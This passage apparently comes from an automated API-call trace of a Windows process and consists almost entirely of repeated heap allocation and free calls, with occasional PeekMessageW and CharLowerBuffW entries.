Size=0x20) returned 0x8def88 [0178.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.192] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0178.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0178.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0178.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0178.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0178.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0178.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f70 [0178.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0178.192] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0178.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0178.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0178.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.193] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.193] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.194] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.194] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0178.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0178.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.197] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.197] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.198] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0178.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.198] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0178.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0178.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.199] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0178.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 